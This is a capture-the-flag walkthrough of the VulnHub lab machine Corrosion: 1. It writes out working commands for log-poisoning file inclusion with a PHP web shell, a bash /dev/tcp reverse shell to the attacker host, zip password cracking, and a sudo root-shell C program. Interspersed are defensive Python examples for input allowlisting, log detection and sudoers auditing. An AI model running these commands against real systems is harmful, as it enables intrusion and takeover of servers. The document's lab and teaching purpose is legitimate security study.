In this article I will walk through the VulnHub penetration-testing target machine Corrosion: 1.

VulnHub target machine introduction:

VulnHub is a collection of intentionally vulnerable virtual machines covering many kinds of vulnerabilities. Each target can be downloaded as a VM image and run locally, and working through one feels like playing a game: penetration testing, privilege escalation, vulnerability exploitation and code auditing become hands-on exercises.

This is a vulnerable target machine; as usual, the goal is to find the flag.

Difficulty: Easy

VulnHub target machine download:

Official website download: https://download.vulnhub.com/corrosion/Corrosion.ova

VulnHub target machine installation:

After downloading, unzip the package and open the .ova file in VMware.


Detailed explanation of the target machine's vulnerabilities:

①: Information gathering:

On Kali, use arp-scan -l or netdiscover to discover hosts on the network.


Use the command: nmap -sS -sV -T4 -n -p- 192.168.0.103

Attacking machine (Kali) IP: 192.168.0.104; target machine IP: 192.168.0.103

Ports 80 and 22 are found open. Accessing port 80 shows the Apache default page, so we scan it in the usual way with dirb, dirsearch, whatweb, gobuster and so on.

The scan finds a /tasks directory; accessing it shows a to-do list with three items:

  1. Changing permissions for authorization logs
  2. Change port 22 -> 7672
  3. Set up phpMyAdmin

Scanning again with dirsearch or gobuster then finds /blog-post, which we access next.


gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt


②: Vulnerability discovery:

No usable information was found, so we keep enumerating and scan the second-level directory; gobuster finds /archives, which we access.

gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip 

The page is blank, which looks like a file-inclusion script whose source produces no output until it is given a parameter. Fuzzing with ffuf finds the parameter name file, which gives us file inclusion:

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0
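The parameter found above is dangerous because randylogs.php hands whatever file value it receives straight to an include. As an added defensive example (not code from the write-up or from the target machine), the following Python shows the check a log viewer should apply instead: an exact allowlist of log names plus a resolved-path containment test, so that absolute paths such as /var/log/auth.log, traversal sequences and PHP stream wrappers are all refused. The base directory /srv/blog-logs and the allowlisted names are assumptions made for the example.

```python
import os

# Constructed allowlist for this example: the only log names the page may show.
ALLOWED_LOGS = frozenset({"randy.log", "error.log"})


def safe_log_path(requested, base_dir, allowed=ALLOWED_LOGS):
    """Map a user-supplied 'file' value onto a file inside base_dir.

    Returns the resolved absolute path, or None when the request must be
    refused. Two independent checks are applied:
      1. the value must be an exact allowlisted name (no paths at all), and
      2. the resolved path must still lie inside base_dir, so that even a
         symlink planted in base_dir cannot point the include elsewhere.
    """
    if not isinstance(requested, str) or "\0" in requested:
        return None
    if requested not in allowed:          # rejects /var/log/auth.log, ../x, php://...
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo(base_dir="/srv/blog-logs"):
    """Run a few representative 'file' values through the check."""
    samples = [
        "randy.log",                                          # legitimate
        "/var/log/auth.log",                                  # absolute path from the write-up
        "../../etc/passwd",                                   # classic traversal
        "randy.log\0.txt",                                    # null-byte trick
        "php://filter/convert.base64-encode/resource=index",  # stream wrapper
    ]
    return {s: safe_log_path(s, base_dir) for s in samples}


if __name__ == "__main__":
    for req, result in demo().items():
        print(f"{req!r:60} -> {result}")
```

Only the bare allowlisted name survives; everything else maps to None and the application should answer with a generic error rather than echoing the value back.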


③: Exploiting the file inclusion (writing a PHP web shell into the SSH log):

ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig  # view the page source: the command executed successfully!

④: Reverse shell:

nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash  # must be URL-encoded before sending

http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash  # URL-encoded here
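Both steps ③ and ④ leave obvious traces on the target: the PHP tag lands in the sshd "Invalid user" line of auth.log, and the Apache access log records a request whose file parameter names a system log and whose cmd parameter, once percent-decoded, contains a /dev/tcp/ reverse shell. The following Python is an added detection example (not part of the write-up) that scans both logs for exactly these indicators. The sample lines are constructed to mirror the commands above, not captured from the target; the sshd and Apache combined-log formats are assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not captured from the target machine).
AUTH_LOG = [
    "Jun 24 10:01:02 corrosion sshd[1201]: Accepted password for randy from 192.168.0.104 port 50110 ssh2",
    "Jun 24 10:03:15 corrosion sshd[1233]: Invalid user <?php system($_REQUEST['cmd']);?> from 192.168.0.104 port 50122",
    "Jun 24 10:03:17 corrosion sshd[1233]: Connection closed by invalid user <?php system($_REQUEST['cmd']);?> 192.168.0.104 port 50122 [preauth]",
]
ACCESS_LOG = [
    '192.168.0.104 - - [24/Jun/2023:10:02:40 +0000] "GET /blog-post/ HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.168.0.104 - - [24/Jun/2023:10:04:01 +0000] "GET /blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig HTTP/1.1" 200 9143 "-" "Mozilla/5.0"',
    '192.168.0.104 - - [24/Jun/2023:10:05:30 +0000] "GET /blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash HTTP/1.1" 200 9143 "-" "Mozilla/5.0"',
]

PHP_OPEN_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)
# Strings that belong in an interactive shell, never in a web query parameter.
SHELL_INDICATORS = re.compile(r"/dev/tcp/|\bbash -i\b|\bsh -i\b|\bnc\b.*\s-e\b", re.IGNORECASE)
# System logs a web application has no business including.
LOG_FILES = {"/var/log/auth.log", "/var/log/secure",
             "/var/log/apache2/access.log", "/var/log/apache2/error.log"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_auth_log(lines):
    """Return sshd lines carrying a PHP open tag: a poisoned username."""
    return [ln for ln in lines if "sshd[" in ln and PHP_OPEN_TAG.search(ln)]


def scan_access_log(lines):
    """Return (request_path, reasons) for requests that look like log
    inclusion or command execution through the included log."""
    hits = []
    for ln in lines:
        m = REQUEST_RE.search(ln)
        if not m:
            continue
        url = m.group(1)
        params = parse_qs(urlsplit(url).query)   # splits on '&' first, then percent-decodes
        reasons = []
        if any(v in LOG_FILES for v in params.get("file", [])):
            reasons.append("file= includes a system log")
        if any(SHELL_INDICATORS.search(v) for v in params.get("cmd", [])):
            reasons.append("cmd= carries a reverse-shell command")
        if reasons:
            hits.append((url, reasons))
    return hits


if __name__ == "__main__":
    for ln in scan_auth_log(AUTH_LOG):
        print("auth.log poisoned:", ln)
    for url, why in scan_access_log(ACCESS_LOG):
        print("suspicious request:", url, "->", "; ".join(why))
```

Decoding before matching matters: the third access-log line never contains the literal text "bash -i", only its percent-encoded form, so a rule that greps the raw line misses it while the decoded cmd value is caught.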

⑤: Privilege escalation via a gcc-compiled file:

After getting a shell, first check the privileges: we are the low-privileged www-data user, so we need to escalate.

Run sudo -l to check for commands that can be run with sudo, and look through randylogs.php for anything hidden.

A backups directory is also found under /var; it may contain a backup file.

To pull files off the target, start a temporary web server on it with Python: python3 -m http.server 8000. Downloading user_backup.zip shows that the archive is password-protected.

Here we use zip2john user_backup.zip > passwd.txt to write the archive's hash into passwd.txt, then crack it with john using a dictionary.

If you run john without a dictionary and abort it, the next run reports an error because a session file like /root/.john/john.rec is left behind. Just delete it with rm -rf /root/.john/john.rec and run john again.

You can crack it with the rockyou dictionary, or use fcrackzip to brute-force the archive instead; the recovered password is: !randybaby

Now we have a password for the randy account; trying to log in as randy over SSH succeeds!

Collect basic information: id, whoami, sudo -l

Here sudo -l shows that /tools/easysysinfo can be run with sudo without a password. cat it and look at it for a moment: it is a compiled program with a .c source file next to it. Then use which gcc to check whether gcc is installed.

If it is, create a new easysysinfo.c with the contents of the code block below, compile it with gcc, and run the compiled file with sudo.

#include <unistd.h>
#include <stdlib.h>

/* Replacement easysysinfo.c from the write-up: when the binary is run
   through sudo it drops to uid/gid 0 and spawns an interactive root shell. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("bash -i");
    return 0;
}
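The escalation above works because sudo grants a command whose file can be swapped for something else. As a defender-side check, here is an added Python example (not code from the write-up or from the target machine) that parses NOPASSWD rules out of a sudoers fragment and flags any command whose file, or whose parent directory, is writable by group or others, is owned by an untrusted user, or does not exist yet. The directory layout, the sudoers lines and the permission bits are constructed for the example; the page does not show the real permissions of /tools.

```python
import os
import re
import stat
import tempfile

# Matches one-line rules such as:  randy ALL=(ALL) NOPASSWD: /tools/easysysinfo
NOPASSWD_RULE = re.compile(
    r"^(?P<user>[^\s#]+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(?P<cmds>.+)$"
)


def parse_nopasswd_rules(sudoers_text):
    """Yield (user, command_path) for every NOPASSWD rule; 'ALL' is skipped."""
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = NOPASSWD_RULE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd or cmd.upper() == "ALL":
                continue
            yield m.group("user"), cmd.split()[0]   # drop any arguments


def audit_sudoers(sudoers_text, owner_ok):
    """Return (user, path, problem) for rules whose target could be replaced.

    owner_ok(uid) -> bool decides whether a file owner is trusted (root on a
    real system). A rule is flagged when the command is missing, when the file
    itself is writable by group/others or owned by an untrusted uid, or when
    its parent directory is, since a writable directory lets the file be swapped.
    """
    findings = []
    group_or_world_w = stat.S_IWGRP | stat.S_IWOTH
    for user, path in parse_nopasswd_rules(sudoers_text):
        if not os.path.exists(path):
            findings.append((user, path, "command path does not exist"))
            continue
        for label, p in (("file", path), ("parent directory", os.path.dirname(path))):
            st = os.stat(p)
            if not owner_ok(st.st_uid):
                findings.append((user, path, f"{label} owned by untrusted uid {st.st_uid}"))
            elif st.st_mode & group_or_world_w:
                findings.append((user, path, f"{label} is writable by group/others"))
    return findings


def demo():
    """Build a throwaway tree mirroring the write-up's layout and audit it."""
    root = tempfile.mkdtemp()
    tools = os.path.join(root, "tools")    # constructed: world-writable directory
    bindir = os.path.join(root, "bin")     # constructed: properly locked down
    for d, mode in ((tools, 0o777), (bindir, 0o755)):
        os.mkdir(d)
        os.chmod(d, mode)                  # explicit chmod so umask cannot interfere
    for f in (os.path.join(tools, "easysysinfo"), os.path.join(bindir, "safe")):
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\necho constructed placeholder binary\n")
        os.chmod(f, 0o755)
    sudoers = f"""
# constructed sudoers fragment for the example
Defaults        env_reset
randy   ALL=(ALL) NOPASSWD: {tools}/easysysinfo
backup  ALL=(root) NOPASSWD: {bindir}/safe, {root}/missing
"""
    # The temp tree is owned by the current user, so treat that uid as "root".
    findings = audit_sudoers(sudoers, owner_ok=lambda uid: uid == os.getuid())
    return [(u, os.path.relpath(p, root), why) for u, p, why in findings]


if __name__ == "__main__":
    for user, path, why in demo():
        print(f"{user}: {path}: {why}")
```

On a real host you would feed it the output of a privileged read of /etc/sudoers and /etc/sudoers.d/* with owner_ok set to uid == 0; the rule for easysysinfo is reported because its directory, not the file, is the weak link.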

⑥: Get the flag:

With that, the flag has been obtained and this walkthrough is complete. Thanks for reading!

VulnHub target machine summary:

The difficulty of this machine is above the middle level, because it is fairly fiddly.
1. Information gathering: arp-scan -l to get the IP address, nmap for port information; web scanning tools: nikto, dirb, dirbuster, whatweb, ffuf and so on; view the page source with F12.
2. File inclusion vulnerability, including the SSH log file and writing a web shell into it with ssh '<?php system($_REQUEST['cmd']);?>'@target-machine (new knowledge point!)
3. nc reverse shell (the payload must be URL-encoded here); cracking the archive with zip2john and john, or with fcrackzip (a zip-archive cracking tool); and the fix for the john session-file error (new knowledge points!)
4. python3 -m http.server 8000 to start a temporary HTTP server
5. Privilege escalation with a gcc-compiled file; which to check whether useful commands exist on the system for escalation

Corrosion is the first target machine in the series; I learned a lot of new things and it was a very rewarding day (yay!).
Writing this up was not easy. I hope it helps everyone; if you like it, please like, favourite and follow. Your happiness is my greatest happiness!


Origin blog.csdn.net/Aluxian_/article/details/131361783